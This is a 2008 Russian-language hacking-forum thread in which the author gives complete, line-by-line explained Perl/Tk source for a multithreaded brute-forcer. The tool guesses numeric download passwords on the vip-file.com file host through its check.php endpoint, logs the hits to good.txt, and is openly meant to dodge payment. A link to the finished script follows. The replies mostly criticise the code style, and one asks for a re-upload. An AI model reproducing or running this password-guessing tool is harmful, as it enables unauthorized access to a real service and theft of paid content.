Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   Написание многопоточного брута веб-форм на перле, на примере vip-file, с GUI (https://forum.antichat.xyz/showthread.php?t=76787)

BlackSun 11.07.2008 06:39
Написание многопоточного брута веб-форм на перле, на примере vip-file, с GUI
 
## Написание многопоточного брута веб-форм на перле, на примере vip-file, с GUI ##


Сразу хочу сказать, что это моя первая статья на ачате и мой первый скрипт на перле, так что сильно не пинайте) Статья расчитана на тех, кто не знаком / мало знаком с перлом ..
Итак, начинаем. Все любят качать с большой скоростью и платить за это бабло какому-то вип-файлу желания мало .. исправим :)

!1 - Подготовка
Для начала понадобится перл,
-- Для винды - качаем ActivePerl
-- Для тукса:
sudo apt-get install perl
sudo apt-get install perl-tk
либо
rpm -ivh perl-Tk-номер_версии-сборка.архитектура.rpm

!1.1 FAQ
Q: Где мона взять большое faq по перлу?)
A: [rus] http://faqs.org.ru/progr/web_lang/perl_faq.htm

Q: А учебник?)
A: http://www.spravkaweb.ru/perl/

Q: Откуда слить документацию по LWP?
A: [rus, pdf] http://pascal.sources.ru/incoming/lwp-spec.zip

Q: Откуда слить документацию на русском по Tk?
A: Действительно, откуда?)) Я юзал Pod Brouser (слить мона с репозитория убунты, Pod Brouser на английском), сплоиты от RST/GHC, респект им, и вот эту небольшую статью:
http://gazette.linux.ru.net/rus/articles/perl_tk.html

!2 - Начинаем
Код:
#!/usr/local/bin/perl
print "##################################\n";
print "#        Vip-File brute        #\n";
print "# (c) BlackSun [S.T.A.R.S. Team] #\n";
print "##################################\n";
Разъясню по строчкам:
#!/usr/local/bin/perl - данная строка должна быть первой в любой Perl-программе. Она указывает системному интерпретатору что данный файл - это Perl-программа.
print "# Vip-File brute #\n"; - вывод на экран, в данном случае мини-about

Едем дальше, подключаем нужные модули
Код:
use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;
use threads;
use threads::shared;
Tk - консоль конешно хорошо, но GUI привычнее)
use - подключает нужный модуль и нам становятся доступны все его подпрограммы. Файл модуля с расширением ".pm" должен храниться в одной из библиотечных директорий Perl. Они перечислены в массиве @INC, одна из них обычно "/usr/local/lib/perl/".

Теперь создаем окно,
Код:
$window = new MainWindow(title => "VFB - Vip File brute");
$window->geometry('420x175');
$window->resizable(0, 0);
$window = new MainWindow(title => "VFB - Vip File brute"); - собственно функция создания окна с заголовком VFB - Vip File brute.
$window->geometry('420x175'); - задаем размеры окна.

Добавим немного переменных, доступных из любого потока
Код:
my $url : shared;
$url = 'http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html';
my $range : shared;
$range = '959000000-999999999';
my $btype : shared;
$btype = 'By range';
my $threads_count : shared;
$threads_count = '50';
my $good : shared;
$good = 0;
my $checked : shared;
$checked = 0;
my $cp : shared;
$cp = 0;
$url - ссыль на залитый файл на вип файле.
$range - диапозон для брута.
$btype - тип брута.
$threads_count - кол-во потоков.
$good - кол-во сбрученных паролей.
$checked - кол-во проверенных паролей.
$cp - текуший пароль.

Окно создали, заполняем его контроллами ..
Код:
# Frames
$left = $window->Frame(-borderwidth => 5)->pack(-side => 'left', -anchor => 'ne');
$right = $window->Frame(-borderwidth => 5)->pack(-side => 'right', -anchor => 'nw');

# url to file
$left->Label(-text => 'URL to file: ')->pack();
$right->Entry(-relief => 'groove', -width => 45, -textvariable => \$url)->pack();

# type of brute
$left->Label(-text => 'Brute type: ')->pack();
$type = $right->BrowseEntry(-relief => "groove", -variable => \$btype);
$type->insert('end', 'By range');
$type->insert('end', 'Random');
$type->pack(-side => 'top' , -anchor => 'w');

# range option
$left->Label(-text => 'Range: ')->pack();
$right->Entry(-relief => 'groove', -width => 45, -textvariable => \$range)->pack();

# threads count
$left->Label(-text => 'Threads count: ')->pack();
$right->Entry(-relief => 'groove', -width => 45, -textvariable => \$threads_count)->pack();

$left->Label(-text => 'Good: ')->pack();
$lgood = $left->Entry(-relief => 'groove', -textvariable => \$good)->pack();
$left->Label(-text => 'Checked: ')->pack();
$lchecked = $left->Entry(-relief => 'groove', -textvariable => \$checked)->pack();

$right->Button(-text => 'Start',
                                        -relief => "groove",
                                        -activeforeground => 'red',
                                        -width => '45',
                                        -command => \&start_brute)->pack();
$right->Button(-text => 'About',
                                        -relief => "groove",
                                        -activeforeground => 'red',
                                        -width => '45',
                                        -command => \&about)->pack();
$right->Button(-text => 'Quit',
                                        -relief => "groove",
                                        -activeforeground => 'red',
                                        -width => '45',
                                        -command => \&exit)->pack();
$window->Frame() - Создаем рамку для группирования контроллов, атрибут -borderwidth отвечает за ширину бордюра.
Метод pack предназначен для задания свойств расположения элемента на форме.
-side => 'left' означает, что рамка будет "прилипать" к левой границе формы.
$left->Label - На левом фрейме создаем текстовую метку aka label, -text думаю и ежу понятно, что отвечает за текст в метке.
$right->Entry - На правом фрейме создаем текстовое поле, -relief отвечает за вид этого поля, -width за ширину, -textvariable за текст в нем.
$type = $right->BrowseEntry - Создаем выпадаюший список.
$type->insert('end', 'By range'); - добавляем в конец этого списка его элементы, первый аттрибут ('end') отвечает за расположение вставляемого элемента, в данном случае - в конец, второй - собственно текст.
Про метод pack я уже писал выше ..
$right->Button - Добавляем на правый фрейм кнопку, -text - текст на кнопке, -activeforeground - цвет текста, когда над кнопкой находится мышь, -command - имя подпрограммы - обработчика, когда на кнопку нажимают.

И запускаем наш интерфейс
Код:
MainLoop();
С оболочкой закончили, приступаем к коду брута .. немного теории:
# Подпрограммы
- Для применения подпрограммы ее необходимо определить либо в текущем модуле (файле), либо во внешнем модуле (файле). Подпрограммы определяются и декларируются следующим образом:
sub имя; - Только декларация. Определение ниже.
sub имя (прототипы); - То же но с декларацией параметров.
sub имя блок; - Декларация и определение.
sub имя (прототипы) блок; - То же, но с параметрами.

# Private переменные.
- Для применения переменных доступных только внутри блока или подпрограммы необходимо определить их с помощью функции my(список). Если переменная одна, то скобки можно опустить.
my() декларирует private переменные в пределах текущей подпрограммы, блока, функции eval() или do/require/use файлов. Private переменные аналогичны auto переменным в С.

Приступаем к написанию ..
Функция about, ну а как без нее)
Код:
sub about()
{
        my $about = "Vip-File brute\r\n(c) BlackSun [S.T.A.R.S. Team]\r\nDemo :)";
        $window->messageBox(-title => '.[ About ].',
                                                                -message => $about,
                                                                -type => 'OK',
                                                                -font => '12');
}
my $about - Определяем приватную переменную с тексом мессаги.
$window->messageBox - Выводим сообшение.
-title - заголовок окна, -message - само сообшение, -type - тип сообшения, в данном случае окно с кнопкой Ok, -font - шрифт, у мну указан только размер.
Итак, 2 кнопки уже работают, About и Quit, теперь напишем доп-ные функции.
Вначале нам надо получить hidden поля с вип файла - uid и fid,

/* небольшое отступление, дальше будут простые GET запросы, если вам понадобятся POST запросы, прокси или базовая авторизация - качайте http://pascal.sources.ru/incoming/lwp-spec.zip */

Функция получения содержимого страницы:
Код:
sub get_content()
{
        $ua = LWP::UserAgent->new();
        $request = HTTP::Request->new(GET => $_[0]);
        $request->header(Accept => 'text/html');
        $result = $ua->request($request);
        if ($result->is_success)
        {
                return $result->content;
        } else
        {
                return 0;
        }
}
$ua = LWP::UserAgent->new - Создаем новый объект LWP::UserAgent.
$request = HTTP::Request->new(GET => $_[0]); создаем новый запрос, в данном случае - GET.
$request->header(Accept => 'text/html'); - в заголовке передаем, что принимаем text/html.
$result = $ua->request($request); - отправляем запрос.
if ($result->is_success) - если удачно, возращяем, что получили, иначе 0.
Вызвать функцию можно будет вот так: $text = &get_content($url);

Функция вывода ошибки:
Код:
sub error()
{
        $window->messageBox(-title => 'Error',
                -message => $_[0],
                -type => 'OK', -font => '12');
        print "Error: ".$_[0]."\n";
        exit();       
}
Все просто, показываем сообшение и выходим.

Функция добавления в лог сбрученных паролей:
Код:
sub add2log()
{
        print "Good: ".$_[0]."\n";
        if(open(LogFile, ">>good.txt"))
        {
                if (!print LogFile $_[0], "\n")
                {
                        &error("Cant write to doog.txt\r\n$_[0]");
                }
                close(LogFile);
        } else
        {
                &error("Cant open good.txt\r\n$_[0]");
        }
}
if(open(LogFile, ">>good.txt")) - Открываем файл good.txt для записи сбрученных паролей, если открыть не вышло (ужос), то выводим мессагу и выходим, LogFile - дескриптор файла.
if (!print LogFile $_[0], "\n") - Записываем в файл сбрученный пароль, если не вышло - выходим сами))
close(LogFile); - Закрываем дескриптор файла.

Функция выдирания uid, name и fid из рипнутого кода, который лежит в $text.
Код:
sub content2hv()
{
        $start = index($text, 'name="uid" value="');
        if ($start == -1)
        {
                &error('Cant find uid.');
        }
        $start = $start + 18;
        $end = index($text, '"', $start);
        $uid = substr($text, $start, $end-$start);
       
        $start = index($text, 'name="name" value="');
        if ($start == -1)
        {
                &error('Cant find name.');
        }       
        $start = $start + 19;
        $end = index($text, '"', $start);
        $name = substr($text, $start, $end-$start);
               
        $start = index($text, 'name="fid" value="');
        if ($start == -1)
        {
                &error('Cant find fid.');
        }
        $start = $start + 18;
        $end = index($text, '"', $start);
        $fid = substr($text, $start, $end-$start);
}
Функция index (синтаксис: index СТРОКА, ПОДСТРОКА[, ПОЗИЦИЯ]) возвращает позицию первого вхождения указанной подстроки в заданную строку или -1, если подстрока не найдена. Если задан параметр ПОЗИЦИЯ, то поиск подстроки осуществляется, начиная с заданной позиции в строке (0 - начало строки).
Функция substr (синтаксис: substr СТРОКА, СМЕЩЕНИЕ [, ДЛИНА[, ЗАМЕЩЕНИЕ]]) извлекает из строки, заданной параметром СТРОКА, подстроку длиной равной значению параметра ДЛИНА, начиная с символа, заданного параметром СМЕЩЕНИЕ. Если СМЕЩЕНИЕ отрицательно, то извлечение начинается с последнего символа строки. Если значение параметра ДЛИНА отрицательно, то от конца строки отсекается количество символов, равное абсолютному значению этого параметра. Если задана строка ЗАМЕЩЕНИЕ, то выделенная подстрока замещается ею в параметре СТРОКА, которы в этом случае должен быть lvalue.

Теперь напишем функцию проверки пароля - для этого надо отправить GET запрос на випфайл:
Код:
http://vip-file.com/sms/check.php?pass=<pass_here>&uid=<uid_here>&name=<name_here>&fid=<fid_here>&submit=%D1%EA%E0%F7%E0%F2%FC
Сама процедура:
Код:
sub check_pass()
{
        $get = "http://vip-file.com/sms/check.php?pass=$_[0]&uid=$uid&name=$name&fid=$fid&submit=%D1%EA%E0%F7%E0%F2%FC";
        $content = &get_content($get);
        if ($content eq '')
        {
                return 0;
        } else
        {
                return index($content, 'This password does not exist');
        }
}
В $get наш запрос, в $content его результат, функция возращяет значение функции index, которая ишет строку в тексте и если не находит, возращяет -1. -1 в данном случае - пароль подошел)

Функция брута:
Код:
sub brute()
{
        while ($cp < $range_end)
        {
                if ($btype eq 'By range')
                {
                        $cp++;
                        if (&check_pass($cp) == -1)
                        {
                                &add2log($cp);
                                $good++;
                        }
                }
                else
                {
                        $pass = int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9));
                        if (&check_pass($pass) == -1)
                        {
                                &add2log($pass);
                                $good++;
                        }               
                }
                $checked++;
        }
}
while ($cp < $range_end) - Цыкл, который будет работать, пока указанный диапазон не закончится, есстесно, если выбран тип брута "Random", то функция будет работать без остановки)
if ($btype eq 'By range') - $btype - комбо-бокс для выбора типа брута.
$cp++; - Увеличиваем на 1 текуший пароль.
if (&check_pass($cp) == -1) - Чекаем пароль, если -1 - значит он подошел.
&add2log($cp); - Описывал выше, добавляет пароль в лог.
$good++; - Увеличиваем счетчик сбрученных паролей.
int - Округляет число до целого,
rand - генерит случайное число.

Функция вывода инфы на экран:
Код:
sub info_thread()
{
        while(1)
        {
                print "Total checked: ".$checked."  |  Valid: ".$good."\n";
                $a = $lgood->configure(-text => $good);
                $a = $lchecked->configure(-text => $checked);
                sleep(5);
        }
}
while(1) - бесконечный цикл.
$a = $lgood->configure(-text => $good); - Обновляем текст в текстовом поле.
sleep(5); - Пауза на 5 секунд.

Обработчик нажантия кнопки Start ))
Код:
sub start_brute()
{
        $cp = substr($range, 0, 9);
        $range_end = substr($range, 10, 9);
        srand();
        if ($btype eq 'By range')
        {
                print "Starting brute by range ..\n";
        } else
        {
                print "Starting brute by random ..\n";
        }
        &add2log('- Brute started -');
        $text = &get_content($url);
        &content2hv();
        threads->new(\&info_thread);
        for (0..$threads_count)
        {
                if ($cp < $range_end)
                {
                        threads->new(\&brute);
                }
        }
        print "All threads created\n";
}
$cp = substr($range, 0, 9); - Получаем начальный пароль, substr - копирует строку $range начиная с 0, длинной в 9.
$range_end = substr($range, 10, 9); - Получаем конечный пароль.
srand(); - Для функции rand.
$text = &get_content($url); - Получаем содержымое страницы с випфайла, дабы выдернуть 3 переменных (uid, fid, name).
&content2hv(); - Выдираем .. )
threads->new(\&info_thread); - Создаем поток для вывода инфы на экран.
for (0..$threads_count) - И в цыкле создаем все потоки - threads->new(\&brute);

!2 The end();

[- Готовый скрипт --- http://secretsdrive.net/get/01/b187d62737/vfb.pl.tar.gz ---]

Теги: Perl, Tk, LWP, Brute, брут, Vip-file, статья, качать бесплатно
---------------------
(c) BlackSun [S.T.A.R.S. Team]
Special for AntiChat.

BlackSun 11.07.2008 11:22
Отпишытесь, кто потестил .. толи у мну руки с .. толи випфайл седня не в духе (

Chuck 15.07.2008 15:00
Что-то я очень-очень плохо понял нафиг оно вообще нужно? Нужно выписывать теорию? Сомневаюсь.
Цитата:
#!/usr/local/bin/perl данная строка должна быть первой в любой Perl-программе. Она указывает системному интерпретатору что данный файл - это Perl-программа.
Это вообще убило.. Типо Perl за одну статью?! Написал бы ещё про биографию ларри и историю создания пёрла. =/
Зачем переписывать теорию и мануалы? не проще дать ли на них ссылки в соответствующем разделе?

Стало даже смешно, когда ты с усердием описываешь приватные переменные и в твоих подключаемых модулях нет use strict...

Впринципе, можно было ограничить всё, что запостено начальными ссылками и ссылкой на какой-нить брут.

Считаю, что данное нужно переместить как максимум в кодинг, т.к. люди, только что-то научившиеся кодить, не напишут ничего дельного по этому поводу... [+] 70% что здесь есть уже давно лежит в учебниках по пёрлу.

genom-- 15.07.2008 18:00
doc по tk намного лудше - ты серавно далеко не все элементы описал
описывать каждую команду скрипта и назвать это статьей тоже лажово
что касается многопоточности с гуем - прикольно конечно но ты, хоть бы как то завершал потоки а то они создадутся будут работать и останутся висеть в оперативе пока не закроешь софт - а если много потоков то много оперативы будут есть - нажмешь пару раз на старт и вся оператива зафукана(1 поток прим 2 метра)

кста консольная полюбому будет быстрее работать
в общем есть еще много над чем поработать - но для первого скрипта на perl сойдет

demonoid 16.07.2008 14:00
Код:
my $url : shared;
$url = 'http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html';
....
my $cp : shared;
$cp = 0;
Выглядит не эстетично =\
Код:
my $url : shared = 'http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html';
....
my $cp : shared  = 0;
Код:
sub get_content()
{
        $ua = LWP::UserAgent->new();
        $request = HTTP::Request->new(GET => $_[0]);
        .......
}
# Подпрограммы
.....
sub имя (прототипы) блок; - То же, но с параметрами.
Круто а где же эти прототипы ? :eek:
Код:
sub get_content( $ )
{
        $ua = new LWP::UserAgent;
        $request = HTTP::Request->new(GET => $_[0]);
        .......
}
Код:
&error("Cant open good.txt\r\n$_[0]");
Perl 4 Tutorial ?

if(open(LogFile, ">>good.txt")) - Открываем файл good.txt для записи сбрученных паролей, если открыть не вышло (ужос), то выводим мессагу и выходим, LogFile - дескриптор файла.
if (!print LogFile $_[0], "\n") - Записываем в файл сбрученный пароль, если не вышло - выходим сами))
close(LogFile); - Закрываем дескриптор файла.


>> - режим дописывание к существующему файлу
существуют логические операторы которые в этом контексте уместны ( ||,or )
+ есть оператор unless


Функция выдирания uid, name и fid из рипнутого кода, который лежит в $text.
Код:
sub content2hv()
{
        $start = index($text, 'name="uid" value="');
        if ($start == -1)
        {
        ....
}
регулярные выражения мощь этого языка , жаль что автор об этом не знает .

целиком согласен с Chuck .
Статья является кашей из манов , автор имеет скудное представление о языке .

vitalikis 08.12.2008 19:39
перезалейте пожалуйста скрипт у кого остался


Время: 02:01